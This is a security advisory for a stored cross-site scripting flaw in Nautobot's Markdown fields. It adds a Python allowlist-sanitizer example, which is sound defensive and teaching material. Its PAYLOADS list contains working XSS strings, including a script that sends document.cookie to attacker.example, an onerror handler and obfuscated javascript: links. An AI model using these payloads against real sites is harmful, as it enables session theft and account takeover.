Severity: HIGH (7.1) · Ecosystem: PyPI
XSS potential in rendered Markdown fields (comments, description, notes, etc.)
GHSA-v4xv-795h-rv4h · CVE-2024-23345 · PYSEC-2024-16
Description
Impact
All users of Nautobot versions earlier than 1.6.10 or 2.1.2 are potentially impacted.
Due to inadequate input sanitization, any user-editable fields that support Markdown rendering, including:
- Circuit.comments
- Cluster.comments
- CustomField.description
- Device.comments
- DeviceRedundancyGroup.comments
- DeviceType.comments
- Job.description
- JobLogEntry.message
- Location.comments
- Note.note
- PowerFeed.comments
- Provider.noc_contact
- Provider.admin_contact
- Provider.comments
- ProviderNetwork.comments
- Rack.comments
- Tenant.comments
- VirtualMachine.comments
- Contents of any custom fields of type markdown
- Job class description attributes
- The SUPPORT_MESSAGE system configuration setting
are potentially susceptible to cross-site scripting (XSS) attacks via maliciously crafted data.
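The bug class behind this advisory is a Markdown renderer that lets raw inline HTML through and then marks the result safe for the template. The following is an added example, not Nautobot's code and not the fix shipped in the referenced pull requests: a stand-in for that unsafe render path beside a hardened version that runs the rendered HTML through an allowlist sanitizer built on the standard library's html.parser. The tag and attribute allowlists, the function names and the payloads are all constructed for this illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allowlist of what rendered Markdown legitimately produces. Everything else
# (script, iframe, img, event-handler attributes, javascript: URLs) is dropped.
# These sets are constructed for the example, not taken from any project.
ALLOWED_TAGS = {"p", "br", "strong", "em", "code", "pre", "ul", "ol", "li", "a",
                "h1", "h2", "h3", "blockquote", "table", "thead", "tbody", "tr", "th", "td"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
ALLOWED_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br"}


def is_safe_url(value):
    """Reject href values whose scheme is not allowlisted (e.g. javascript:).
    Browsers strip ASCII whitespace/control characters before parsing a URL,
    so strip them here too or 'java\\tscript:' would pass as a relative URL."""
    stripped = "".join(ch for ch in value if ord(ch) > 0x20)
    scheme = urlparse(stripped).scheme  # urlparse lower-cases the scheme
    return scheme == "" or scheme in ALLOWED_SCHEMES


class AllowlistSanitizer(HTMLParser):
    """Re-serialises HTML keeping only allowlisted tags and attributes.
    Text inside a dropped tag is kept (a <div> just loses its wrapper), except
    for script/style, whose content is discarded entirely."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []      # what was removed, for audit logging
        self._skipping = None  # set to "script"/"style" while inside one

    def handle_starttag(self, tag, attrs):
        if self._skipping:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(f"<{tag}>")
            if tag in ("script", "style"):
                self._skipping = tag
            return
        rendered = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"<{tag} {name}>")  # covers every on* handler
                continue
            if name == "href" and not is_safe_url(value):
                self.dropped.append(f"<{tag} href={value!r}>")
                continue
            rendered.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(rendered)}>")

    def handle_endtag(self, tag):
        if self._skipping:
            if tag == self._skipping:
                self._skipping = None
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skipping:
            # convert_charrefs decoded entities; re-escape so text stays text
            self.out.append(escape(data, quote=False))


def sanitize_html(html):
    """Return (sanitized_html, list_of_dropped_items) so callers can log strips."""
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.dropped


def render_markdown_unsafe(text):
    """Stand-in for the vulnerable pattern: Markdown renderers pass raw inline
    HTML through untouched and the result is marked safe for the template.
    The paragraph wrapper is all the 'rendering' this example does."""
    return f"<p>{text}</p>"


def render_markdown_safe(text):
    """Hardened pattern: sanitize the rendered HTML after the Markdown step,
    so raw HTML embedded in the Markdown source cannot survive."""
    rendered, _dropped = sanitize_html(render_markdown_unsafe(text))
    return rendered


# Constructed payloads of the kind a user could save into a comments field.
PAYLOADS = {
    "script": "Looks fine<script>fetch('https://attacker.example/?c='+document.cookie)</script>",
    "event_handler": '<img src="x" onerror="alert(document.domain)">',
    "js_link": '<a href="javascript:alert(1)">open ticket</a>',
    "tab_js_link": '<a href="java\tscript:alert(1)">open ticket</a>',
    "legit_link": '<a href="https://example.com/runbook" onclick="steal()">runbook</a>',
}

if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(f"{name}:\n  unsafe: {render_markdown_unsafe(payload)}\n  safe:   {render_markdown_safe(payload)}")
```

The point worth keeping from this example is where the sanitizer sits: after the Markdown-to-HTML conversion, on the output, because a Markdown renderer's raw-HTML passthrough means filtering the source text is not enough. Logging the `dropped` list gives a detection signal for users who keep saving payloads into comment fields.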
Patches
Fixed in Nautobot versions 1.6.10 and 2.1.2.
References
https://github.com/nautobot/nautobot/pull/5133
https://github.com/nautobot/nautobot/pull/5134
References
- WEB https://github.com/nautobot/nautobot/security/advisories/GHSA-v4xv-795h-rv4h
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2024-23345
- WEB https://github.com/nautobot/nautobot/pull/5133
- WEB https://github.com/nautobot/nautobot/pull/5134
- WEB https://github.com/nautobot/nautobot/commit/17effcbe84a72150c82b138565c311bbee357e80
- WEB https://github.com/nautobot/nautobot/commit/64312a4297b5ca49b6cdedf477e41e8e4fd61cce
- PACKAGE https://github.com/nautobot/nautobot
- WEB https://github.com/pypa/advisory-database/tree/main/vulns/nautobot/PYSEC-2024-16.yaml